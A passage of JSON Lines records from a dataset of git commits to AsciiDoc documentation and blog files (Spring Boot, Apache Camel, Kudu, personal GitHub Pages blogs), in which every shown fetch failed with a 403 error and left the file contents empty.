2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-07-4K-Surround-Gaming-Setup-With-4-NVIDIA-Titans-CES-2014.adoc","new_file":"_posts\/2014-01-07-4K-Surround-Gaming-Setup-With-4-NVIDIA-Titans-CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1f9903fdd22b819c8984ac8f6761d3eec931555","subject":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2f172b93508d4307c16d921a2374a8574118839","subject":"Added When EIP docs","message":"Added When EIP docs\n","repos":"tadayosi\/camel,curso007\/camel,anoordover\/camel,christophd\/camel,curso007\/camel,jonmcewen\/camel,jamesnetherton\/camel,DariusX\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,onders86\/camel,alvinkwekel\/camel,kevinearls\/camel,ullgren\/camel,gnodet\/camel,cunningt\/camel,sverkera\/camel,snurmine\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,snurmine\/camel,dmvolod\/camel,apache\/camel,pax95\/camel,punkhorn\/camel-upstream,sverkera\/camel,apache\/camel,akhettar\/camel,nicolaferraro\/camel,pax95\/camel,anoordover\/camel,objectiser\/camel,tdiesler\/camel,kevinearls\/camel,tadayosi\/camel,davidkarlsen\/camel,zregvart\/camel,jamesnetherton\/camel,akhettar\/camel,kevinearls\/camel,objectiser\/camel,onders86\/camel,curso007\/camel,christophd\/camel,onders86\/camel,anoordover\/camel,tdiesler\/camel,snurmine\/camel,ullgren\/camel,adessaigne\/camel,jamesnetherton\/camel,dmvolod\/camel,gautric\/camel,dmvolod\/camel,pax95\/camel,jamesnetherton\/camel,adessaigne\/camel,pmoerenhout\/camel,curso007\/camel,adessaigne\/camel,alvinkwekel\/camel,anoordover\/camel,ullgren\/camel,gautric\/camel,tadayosi\/camel,snurmine\/camel,dmvolod\/camel,sverkera\/camel,DariusX\/camel,gnodet\/camel,nicolaferraro\/camel,jonmcewen\/camel,kevinearls\/camel,mcollovati\/camel,onders86\/camel,alvinkwekel\/camel,kevinearls\/camel,dmvolod\/camel,davidkarlsen\/camel,jonmcewen\/camel,jonmcewen\/camel,gnodet\/camel,apache\/camel,sverkera\/camel,jamesnetherton\/camel,nicolaferraro\/camel,gnodet\/camel,gautric\/camel,dmvolod\/camel,mcollovati\/camel,punkhorn\/camel-upstream,tdiesler\/camel,ullgren\/camel,onders86\/camel,DariusX\/camel,mcollovati\/camel,nikhilvibhav\/camel,sverkera\/camel,sverkera\/camel,christophd\/camel,tdiesler\/camel,objectiser\/camel,jonmcewen\/camel,Fabryprog\/camel,apache\/camel,jamesnetherton\/camel,DariusX\/camel,pax95\/camel,zregvart\/camel,onders86\/camel,davidkarlsen\/camel,anoordover\/camel,apache\/camel,adessaigne\/camel,zregvart\/camel,Fabryprog\/camel,Fabryprog\/camel,CodeSmell\/camel,pax95\/camel,punkhorn\/camel-upstream,akhettar\/camel,akhettar\/camel,tdiesler\/camel,cunningt\/camel,cunningt\/camel,alvinkwekel\/camel,nicolaferraro\/camel,gautric\/camel,Fabryprog\/camel,adessaigne\/camel,gnodet\/camel,mcollovati\/camel,tadayosi\/camel,jonmcewen\/camel,objectiser\/camel,tdiesler\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,anoordover\/camel,kevinearls\/camel,curso007\/camel,akhettar\/camel,snurmine\/camel,cunningt\/camel,gautric\/camel,akhettar\/camel,CodeSmell\/camel,davidkarlsen\/camel,tadayosi\/camel,pmoerenhout\/camel,gautric\/camel,pmoerenhout\/camel,christophd\/camel,snurmine\/camel,pmoerenhout\/camel,zregvart\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/when-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/when-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e49a9a8a345e0b68ac4e92f7bd917d792b85e6f6","subject":"y2b create post 60-inch TV Giveaway + Twitter Q\\u0026A!","message":"y2b create post 60-inch TV Giveaway + Twitter Q\\u0026A!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-28-60inch-TV-Giveaway--Twitter-Qu0026A.adoc","new_file":"_posts\/2013-01-28-60inch-TV-Giveaway--Twitter-Qu0026A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c159c21f7f16e23719913c9934e9329cfd2fd9e","subject":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","message":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8697c9229a21c00574b9937caa14800edb20969","subject":"Update 2016-08-23-Real-Time-Control-Operating-Systems.adoc","message":"Update 2016-08-23-Real-Time-Control-Operating-Systems.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-08-23-Real-Time-Control-Operating-Systems.adoc","new_file":"_posts\/2016-08-23-Real-Time-Control-Operating-Systems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"222de061dba5f1c82f45652c3530c399b2831b86","subject":"CL note: ls","message":"CL note: ls\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ea5195c8a68ad83af7da460af4093afb49c4cf8c","subject":"Better document how DataSource is bound to the env","message":"Better document how DataSource is bound to the env\n\nCloses gh-4971\n","repos":"lexandro\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,kamilszymanski\/spring-boot,jbovet\/spring-boot,cleverjava\/jenkins2-course-spring-boot,htynkn\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,lexandro\/spring-boot,NetoDevel\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,mbogoevici\/spring-boot,shakuzen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,chrylis\/spring-boot,zhanhb\/spring-boot,candrews\/spring-boot,mosoft521\/spring-boot,scottfrederick\/spring-boot,zhanhb\/spring-boot,akmaharshi\/jenkins,lexandro\/spring-boot,bijukunjummen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot-concourse,dreis2211\/spring-boot,minmay\/spring-boot,neo4j-contrib\/spring-boot,lburgazzoli\/spring-boot,joansmith\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,lucassaldanha\/spring-boot,sebastiankirsch\/spring-boot,minmay\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,jayarampradhan\/spring-boot,jmnarloch\/spring-boot,felipeg48\/spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,habuma\/spring-boot,mbenson\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,mdeinum\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,afroje-reshma\/spring-boot-sample,joshiste\/spring-boot,kdvolder\/spring-boot,Nowheresly\/spring-boot,joshiste\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,olivergierke\/spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,ptahchiev\/spring-boot,eddumelendez\/spring-boot,ollie314\/spring-boot,bijukunjummen\/spring-boot,vakninr\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,afroje-reshma\/spring-boot-sample,jxblum\/spring-boot,xiaoleiPENG\/my-project,tiarebalbi\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,afroje-reshma\/spring-boot-sample,DeezCashews\/spring-boot,nebhale\/spring-boot,lenicliu\/spring-boot,lucassaldanha\/spring-boot,akmaharshi\/jenkins,kamilszymanski\/spring-boot,lburgazzoli\/spring-boot,brettwooldridge\/spring-boot,shangyi0102\/spring-boot,scottfrederick\/spring-boot,yangdd1205\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,wilkinsona\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,deki\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,jayarampradhan\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,bbrouwer\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,akmaharshi\/jenkins,qerub\/spring-boot,yangdd1205\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,olivergierke\/spring-boot,hello2009chen\/spring-boot,bjornlindstrom\/spring-boot,yhj630520\/spring-boot,sebastiankirsch\/spring-boot,akmaharshi\/jenkins,htynkn\/spring-boot,sbcoba\/spring-boot,NetoDevel\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,chrylis\/spring-boot,RichardCSantana\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,jvz\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,thomasdarimont\/spring-boot,nebhale\/spring-boot,joansmith\/spring-boot,herau\/spring-boot,jvz\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,donhuvy\/spring-boot,bbrouwer\/spring-boot,vakninr\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,cleverjava\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,olivergierke\/spring-boot,olivergierke\/spring-boot,mosoft521\/spring-boot,afroje-reshma\/spring-boot-sample,thomasdarimont\/spring-boot,izeye\/spring-boot,herau\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,brettwooldridge\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,ilayaperumalg\/spring-boot,joshthornhill\/spring-boot,shangyi0102\/spring-boot,RichardCSantana\/spring-boot,deki\/spring-boot,bjornlindstrom\/spring-boot,i007422\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,michael-simons\/spring-boot,jxblum\/spring-boot,ollie314\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,mbogoevici\/spring-boot,lexandro\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,pvorb\/spring-boot,qerub\/spring-boot,ollie314\/spring-boot,joansmith\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,Buzzardo\/spring-boot,jmnarloch\/spring-boot,javyzheng\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,vakninr\/spring-boot,htynkn\/spring-boot,tsachev\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,htynkn\/spring-boot,lburgazzoli\/spring-boot,SaravananParthasarathy\/SPSDemo,philwebb\/spring-boot,zhanhb\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,drumonii\/spring-boot,royclarkson\/spring-boot,lenicliu\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,jbovet\/spring-boot,neo4j-contrib\/spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,afroje-reshma\/spring-boot-sample,dreis2211\/spring-boot,xiaoleiPENG\/my-project,sbcoba\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,i007422\/jenkins2-course-spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,thomasdarimont\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,rweisleder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,drumonii\/spring-boot,mosoft521\/spring-boot,NetoDevel\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,jbovet\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,candrews\/spring-boot,sebastiankirsch\/spring-boot,SaravananParthasarathy\/SPSDemo,pvorb\/spring-boot,drumonii\/spring-boot,Nowheresly\/spring-boot,qerub\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,DeezCashews\/spring-boot,sbcoba\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,zhanhb\/spring-boot,ptahchiev\/spring-boot,hello2009chen\/spring-boot,herau\/spring-boot,lenicliu\/spring-boot,ptahchiev\/spring-boot,izeye\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,tiarebalbi\/spring-boot,habuma\/spring-boot,dreis2211\/spring-boot,hqrt\/jenkins2-course-spring-boot,lexandro\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,deki\/spring-boot,mbenson\/spring-boot,RichardCSantana\/spring-boot,tsachev\/spring-boot,Nowheresly\/spring-boot,philwebb\/spring-boot-concourse,tiarebalbi\/spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,izeye\/spring-boot,sbcoba\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,deki\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,mbogoevici\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,joansmith\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,ilayaperumalg\/spring-boot,javyzheng\/spring-boot,jmnarloch\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,vpavic\/spring-boot,minmay\/spring-boot,hqrt\/jenkins2-course-spring-boot,isopov\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot,qerub\/spring-boot,SaravananParthasarathy\/SPSDemo,aahlenst\/spring-boot,thomasdarimont\/spring-boot,royclarkson\/spring-boot,jbovet\/spring-boot,jvz\/spring-boot,scottfrederick\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,spring-projects\/spring-boot,sebastiankirsch\/spring-boot,brettwooldridge\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,dreis2211\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,yhj630520\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,yhj630520\/spring-boot,joshthornhill\/spring-boot,aahlenst\/spring-boot,nebhale\/spring-boot,jvz\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,nebhale\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,wilkinsona\/spring-boot,linead\/spring-boot,ihoneymon\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,kamilszymanski\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,vpavic\/spring-boot,vakninr\/spring-boot,lucassaldanha\/spring-boot,linead\/spring-boot,sebastiankirsch\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,deki\/spring-boot,Buzzardo\/spring-boot,kamilszymanski\/spring-boot,habuma\/spring-boot,bclozel\/spring-boot,bbrouwer\/spring-boot,felipeg48\/spring-boot,felipeg48\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,pvorb\/spring-boot,tsachev\/spring-boot,Nowheresly\/spring-boot,jayarampradhan\/spring-boot,RichardCSantana\/spring-boot,hqrt\/jenkins2-course-spring-boot,vakninr\/spring-boot,RichardCSantana\/spring-boot,i007422\/jenkins2-course-spring-boot,javyzheng\/spring-boot,mdeinum\/spring-boot,ihoneymon\/spring-boot,bijukunjummen\/spring-boot,qerub\/spring-boot,hqrt\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,philwebb\/spring-boot,candrews\/spring-boot,jbovet\/spring-boot,joshthornhill\/spring-boot,philwebb\/spring-boot,xiaoleiPENG\/my-project,scottfrederick\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,chrylis\/spring-boot,Nowheresly\/spring-boot,bijukunjummen\/spring-boot,shakuzen\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,jxblum\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,hqrt\/jenkins2-course-spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,vpavic\/spring-boot,pvorb\/spring-boot,htynkn\/spring-boot,bjornlindstrom\/spring-boot,philwebb\/spring-boot,neo4j-contrib\/spring-boot,linead\/spring-boot,Buzzardo\/spring-boot,jmnarloch\/spring-boot,ptahchiev\/spring-boot,xiaoleiPENG\/my-project,spring-projects\/spring-boot,bbrouwer\/spring-boot,neo4j-contrib\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3f202d63984325f8af59cf655d066b73678efb9a","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1d27fcced533fb5bbf9e781830842fdbbe6213f","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddbd2e00f048563047da4303058fb667dae2a4a3","subject":"Add missing file changes","message":"Add missing file changes\n","repos":"mstahv\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework","old_file":"documentation\/articles\/UsingVaadinCDIWithJAASAuthentication.asciidoc","new_file":"documentation\/articles\/UsingVaadinCDIWithJAASAuthentication.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97979577456b5f3c20cb9c0de9a1e3a9818272c1","subject":"Update contributing section","message":"Update contributing section\n","repos":"uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ce228b20ac92bb06c848257e24a0d42be8d917be","subject":"Added gettext as a system dependence.","message":"Added gettext as a system dependence.","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"970ad6adac43e24601679883af398bf66596f88f","subject":"Documented the prefixes of html ids","message":"Documented the prefixes of html ids\n","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0c0ef59b4a8e3c98a86fe8c6e1cd95711f00e4b2","subject":"Started a troubleshooting document","message":"Started a troubleshooting document\n","repos":"jdigger\/jgit-process","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jdigger\/jgit-process.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a9f162956245caa85c85655042bb18def1381e0","subject":"Update 2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","message":"Update 2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","new_file":"_posts\/2018-12-11-Der-Wissenschaft-ihre-Autorchen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a40e40db1d9db2dd93deb892f191c1e31750a60","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be80bba85e4ca86a1e18ef5a6c0e3a44b2d8c514","subject":"y2b create post This Gadget Turns Sound Into Better Bubbles...","message":"y2b create post This Gadget Turns Sound Into Better Bubbles...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-16-This-Gadget-Turns-Sound-Into-Better-Bubbles.adoc","new_file":"_posts\/2017-08-16-This-Gadget-Turns-Sound-Into-Better-Bubbles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02435f102407e33c5dbf80589997660865e8c019","subject":"Minor grammar proofread","message":"Minor grammar proofread","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ec3b267868c26c39e57522a2eaca3ea87afe29d","subject":"Update 2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","message":"Update 2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","new_file":"_posts\/2017-03-17-APIs-with-Python-Flask-and-Aiohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6be33bf3f841857566349c5859b09d4f81d843f2","subject":"docs: Add 1.5.0 to prior release notes","message":"docs: Add 1.5.0 to prior release notes\n\nChange-Id: Idc6ac068161a3ead277b9c04170d80f88a55b405\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8722\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/prior_release_notes.adoc","new_file":"docs\/prior_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: